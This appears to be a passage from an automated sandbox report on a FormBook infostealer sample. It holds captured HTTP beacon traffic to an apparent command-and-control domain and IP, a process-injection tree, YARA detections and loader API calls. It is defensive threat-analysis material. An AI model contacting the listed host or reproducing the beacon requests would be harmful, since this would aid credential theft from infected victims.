6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	49749	217.196.55.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:35.351722002 CEST	1817	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 31 33 44 6c 54 76 7a 63 2f 49 66 64 6e 42 33 32 7a 57 54 57 4b 66 59 72 65 55 75 34 78 6b 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 56 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 37 69 78 52 6a 6b 58 59 50 6c 32 65 35 46 44 4f 6a 78 51 58 34 32 37 7a 6a 55 6e 55 5a 6a 56 6a 70 74 75 77 67 70 6d 77 65 6c 4a 41 31 39 55 4c 32 39 43 33 58 4a 66 34 76 50 49 4b 36 41 54 59 30 6e 56 78 4b 50 4e 6f 32 5a 77 6a 4c 73 52 69 58 7a 4c 70 30 68 57 37 58 43 78 59 74 55 34 59 67 30 5a 6f 53 50 49 43 42 78 71 70 51 5a 63 41 4e 51 32 73 32 41 7a 64 79 41 52 47 52 46 51 65 38 63 44 61 38 38 68 57 4b 71 4a 56 32 6d 4d 75 39 68 6d 71 78 70 70 4d 7a 53 53 52 37 55 41 34 64 57 31 36 42 75 32 44 4b 6a 62 67 54 36 4c 2f 44 62 52 6c 4e 69 6d 4d 73 42 2b 50 37 35 4d 68 63 6d 57 33 32 6b 41 57 78 46 73 53 6c 64 6c 4d 55 34 4d 64 2b 54 43 34 4e 4d 6c 55 6a 70 57 30 66 43 57 61 36 4d 77 6a 7a 6f 35 74 4a 50 2f 4d 31 73 31 61 6f 43 79 6b 76 64 70 79 63 39 77 36 48 48 46 44 59 39 30 7a 6b 34 43 4b 69 6e 6f 71 68 4e 79 34 34 6c 59 39 59 65 56 2b 61 31 51 67 52 68 43 37 54 4e 5a 34 2b 55 54 36 67 57 67 34 45 6c 4b 57 61 6a 4d 57 74 34 66 61 70 6d 45 4f 57 75 55 6f 69 6a 47 52 69 41 54 41 61 64 4f 78 76 64 70 44 4e 68 45 66 6b 47 37 77 55 53 41 4e 5a 75 5a 6a 6f 66 44 70 76 4e 64 70 59 4e 6d 39 31 79 41 51 73 4e 33 38 6f 43 33 77 57 6e 76 30 72 79 30 77 32 56 49 32 6e 49 55 31 33 79 4e 57 66 66 65 32 63 75 48 31 73 30 69 6f 6f 7a 31 4e 35 4c 61 4c 74 58 6c 59 4f 30 6f 70 56 2f 74 67 4c 33 6f 6f 73 75 2f 70 41 78 43 79 6c 30 43 69 48 70 4d 58 6c 76 44 4d 37 2f 35 52 70 39 37 55 4a 44 33 2f 65 64 57 4a 2b 5a 6f 66 77 6e 6e 37 44 6b 61 56 48 2f 41 6f 38 6a 49 2b 70 59 66 35 6b 31 66 35 62 62 43 52 46 49 4e 68 58 51 75 41 42 53 50 6f 32 78 69 48 62 66 38 54 37 58 77 50 74 35 5a 6f 37 68 6b 6c 63 6c 71 4f 68 71 56 45 7a 33 76 31 39 6a 2f 50 35 4a 56 31 6d 34 51 75 35 64 2b 67 6c 45 44 6a 44 72 52 72 53 55 77 4f 42 55 58 68 6a 65 48 47 62 33 67 55 49 71 49 33 4c 66 46 71 6d 36 72 62 53 69 32 63 4b 4c 42 49 65 55 6c 6d 70 33 70 38 64 42 67 59 37 69 59 4c 50 4f 36 72 32 4a 61 4b 36 65 53 30 74 4e 31 4b 46 37 33 33 6f 54 44 4b 43 44 32 68 30 48 73 6d 5a 47 75 56 44 79 78 5a 63 4c 78 72 67 39 4c 70 63 51 69 75 2b 71 69 32 53 67 71 49 65 57 49 6f 4d 6e 39 4f 50 52 48 31 32 77 5a 48 45 6a 7a 77 5a 66 46 42 58 6a 6e 35 75 62 57 6a 57 73 78 6e 48 55 67 59 65 63 44 6a 54 38 38 66 66 52 55 35 49 4f 37 42 52 78 76 57 31 41 55 70 63 73 69 4f 74 47 4a 7a 76 79 75 6d 4c 34 53 43 57 61 4e 4d 38 33 7a 57 52 57 30 43 71 69 66 59 2f 73 4e 70 73 38 30 37 62 70 47 51 57 71 79 6c 2b 32 39 65 68 48 65 47 35 79 69 65 68 79 34 50 56 2f 4b 42 6d 65 55 6b 2b 59 39 47 68 51 4a 78 61 38 33 63 79 79 64 50 67 6a 64 55 32 56 72 55 50 74 59 42 63 41 55 46 42 30 2b 79 41 51 34 50 7a 66 53 45 70 6e 73 75 76 66 74 6d 41 47 46 39 36 4a 4f 51 47 56 45 69 37 79 56 68 55 3d Data Ascii: OVFPBtpp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3Nn13DlTvzc/IfdnB32zWTWKfYreUu4xkscrKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fV/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLsRiXzLp0hW7XCxYtU4Yg0ZoSPICBxqpQZcANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9hmqxppMzSSR7UA4dW16Bu2DKjbgT6L/DbRlNimMsB+P75MhcmW32kAWxFsSldlMU4Md+TC4NMlUjpW0fCWa6Mwjzo5tJP/M1s1aoCykvdpyc9w6HHFDY90zk4CKinoqhNy44lY9YeV+a1QgRhC7TNZ4+UT6gWg4ElKWajMWt4fapmEOWuUoijGRiATAadOxvdpDNhEfkG7wUSANZuZjofDpvNdpYNm91yAQsN38oC3wWnv0ry0w2VI2nIU13yNWffe2cuH1s0iooz1N5LaLtXlYO0opV/tgL3oosu/pAxCyl0CiHpMXlvDM7/5Rp97UJD3/edWJ+Zofwnn7DkaVH/Ao8jI+pYf5k1f5bbCRFINhXQuABSPo2xiHbf8T7XwPt5Zo7hklclqOhqVEz3v19j/P5JV1m4Qu5d+glEDjDrRrSUwOBUXhjeHGb3gUIqI3LfFqm6rbSi2cKLBIeUlmp3p8dBgY7iYLPO6r2JaK6eS0tN1KF733oTDKCD2h0HsmZGuVDyxZcLxrg9LpcQiu+qi2SgqIeWIoMn9OPRH12wZHEjzwZfFBXjn5ubWjWsxnHUgYecDjT88ffRU5IO7BRxvW1AUpcsiOtGJzvyumL4SCWaNM83zWRW0CqifY/sNps807bpGQWqyl+29ehHeG5yiehy4PV/KBmeUk+Y9GhQJxa83cyydPgjdU2VrUPtYBcAUFB0+yAQ4PzfSEpnsuvftmAGF96JOQGVEi7yVhU=
Apr 26, 2024 10:09:35.527931929 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 26 Apr 2024 08:09:35 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	49750	217.196.55.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:38.064536095 CEST	510	OUT	GET /fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:09:38.240624905 CEST	1212	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 26 Apr 2024 08:09:38 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Target ID:	0
Start time:	10:06:23
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\150-425-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\150-425-2024.exe"
Imagebase:	0xbc0000
File size:	1'528'320 bytes
MD5 hash:	C93C9F74B4F78E098F297FD4DAFFF423
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:06:24
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\150-425-2024.exe"
Imagebase:	0x820000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:06:31
Start date:	26/04/2024
Path:	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe"
Imagebase:	0x6b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	10:06:32
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xb80000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:06:46
Start date:	26/04/2024
Path:	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe"
Imagebase:	0x6b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:06:57
Start date:	26/04/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	46

Executed Functions

Function 00BC3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC3B7A
IsDebuggerPresent.KERNEL32 ref: 00BC3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00C862F8,00C862E0,?,?), ref: 00BC3BFD

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Part of subcall function 00BD0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BC3C26,00C862F8,?,?,?), ref: 00BD0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00BC3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C793F0,00000010), ref: 00BFD4BC
SetCurrentDirectoryW.KERNEL32(?,00C862F8,?,?,?), ref: 00BFD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C75D40,00C862F8,?,?,?), ref: 00BFD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00BFD581

Part of subcall function 00BC3A58: GetSysColorBrush.USER32(0000000F), ref: 00BC3A62
Part of subcall function 00BC3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00BC3A71
Part of subcall function 00BC3A58: LoadIconW.USER32(00000063), ref: 00BC3A88
Part of subcall function 00BC3A58: LoadIconW.USER32(000000A4), ref: 00BC3A9A
Part of subcall function 00BC3A58: LoadIconW.USER32(000000A2), ref: 00BC3AAC
Part of subcall function 00BC3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC3AD2
Part of subcall function 00BC3A58: RegisterClassExW.USER32(?), ref: 00BC3B28

Part of subcall function 00BC39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC3A15
Part of subcall function 00BC39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC3A36
Part of subcall function 00BC39E7: ShowWindow.USER32(00000000,?,?), ref: 00BC3A4A
Part of subcall function 00BC39E7: ShowWindow.USER32(00000000,?,?), ref: 00BC3A53

Part of subcall function 00BC43DB: _memset.LIBCMT ref: 00BC4401
Part of subcall function 00BC43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC44A6

Strings

runas, xrefs: 00BFD575
This is a third-party compiled AutoIt script., xrefs: 00BFD4B4

